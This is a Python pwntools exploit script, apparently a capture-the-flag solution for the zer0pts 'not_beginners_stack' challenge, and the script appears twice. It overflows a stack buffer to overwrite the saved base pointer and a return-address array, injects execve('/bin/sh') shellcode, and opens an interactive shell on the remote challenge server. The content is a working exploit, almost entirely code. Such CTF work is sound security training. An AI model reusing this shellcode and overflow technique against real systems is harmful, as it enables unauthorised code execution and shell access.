farazsth98/not_beginners_stack.py

## not_beginners_stack.py
#!/usr/bin/env python3

from pwn import *

#p = process("./chall")
p = remote("pwn.ctf.zer0pts.com", 9011)

#gdb.attach(p)

# Overwrite rbp with return address array + some offset
p.sendafter("Data: ", b"A"*0x100 + p64(0x600234+0xd0)[:6])

# Now we send shellcode + /bin/sh string, it will be stored at rbp-100
shellcode = b"\x48\xC7\xC7\x04\x02\x60\x00\x48\x31\xF6\x48\x31\xD2\x48\xC7\xC0\x3B\x00\x00\x00\x0F\x05"
shellcode = b"/bin/sh\x00" + shellcode

# Pad to return address array
payload = shellcode + b"AA"
payload += b"A"*8

# Right before the return address array, there is an index variable. set this
# to 2, it will be set to 1 before accessing the array
payload += b"\x00\x00\x02\x00\x00\x00\x00\x00"

# Pad more to array
payload += b"B"*8

# Overwrite array index 1 with our shellcode's address
payload += p64(0x600204+8)

# Sice
p.sendafter("Data: ", payload)

p.interactive()
	#!/usr/bin/env python3

	from pwn import *

	#p = process("./chall")
	p = remote("pwn.ctf.zer0pts.com", 9011)

	#gdb.attach(p)

	# Overwrite rbp with return address array + some offset
	p.sendafter("Data: ", b"A"*0x100 + p64(0x600234+0xd0)[:6])

	# Now we send shellcode + /bin/sh string, it will be stored at rbp-100
	shellcode = b"\x48\xC7\xC7\x04\x02\x60\x00\x48\x31\xF6\x48\x31\xD2\x48\xC7\xC0\x3B\x00\x00\x00\x0F\x05"
	shellcode = b"/bin/sh\x00" + shellcode

	# Pad to return address array
	payload = shellcode + b"AA"
	payload += b"A"*8

	# Right before the return address array, there is an index variable. set this
	# to 2, it will be set to 1 before accessing the array
	payload += b"\x00\x00\x02\x00\x00\x00\x00\x00"

	# Pad more to array
	payload += b"B"*8

	# Overwrite array index 1 with our shellcode's address
	payload += p64(0x600204+8)

	# Sice
	p.sendafter("Data: ", payload)

	p.interactive()